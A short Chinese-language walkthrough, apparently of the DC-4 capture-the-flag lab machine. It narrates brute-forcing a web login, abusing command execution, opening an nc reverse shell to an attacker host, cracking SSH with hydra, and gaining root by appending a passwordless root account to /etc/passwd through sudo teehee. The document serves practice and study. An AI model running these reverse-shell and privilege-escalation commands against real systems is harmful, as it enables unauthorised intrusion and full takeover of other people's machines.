1.日常扫描局域网存活主机
发现目标:192.168.43.30
开启了80端口和22端口,80端口进去是一个登陆框,可以尝试爆破,随手整了个top500
2.爆破一把梭
登陆窗口,试了万能密码,不行,于是想到暴力破解
梭出来了,admin:happy
3.命令执行
抓包
登陆进去发现可以执行系统命令,于是抓包,实现执行任意命令(在所拥有的权限之下)
4.nc反弹shell
先监听好
nc -lvvp 8001
然后执行反弹
nc 192.168.43.164 8001 -e /bin/bash
弹回来了,随手看下whoami,顺便翻翻目录下有什么东西
home目录下有三个用户
jim
sam
charles
缺几个密码,2333
在/home/jim/backups/下发现一个可能是旧密码的密码备份文件,于是拿下来,拿去爆破
5.hydra破解ssh密码
密码到手,ssh连接进去
6.谜之邮件
在这里有一封邮件,我居然,居然没注意就看过去了。。。。裂开(还是要细心啊)
后面又看了几遍,终于看到邮件了,简直热泪盈眶,邮件里面是一个用户的密码【自己出去浪可还行】
切换用户过去
我在这就卡住了,到底还是太菜了
7.???没错,是我看不懂的提权
https://www.cnblogs.com/zaqzzz/p/12075132.html
https://www.jianshu.com/p/ac10a4149eef
sudo -l 显示出自己(执行 sudo 的使用者)的权限
提权
charles@dc-4:/home/jim$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
切换用户,getflag
8.总结
这里提权各有优劣吧,一个是利用定时任务反弹root权限
另一个取巧直接添加一个root用户【妙啊】
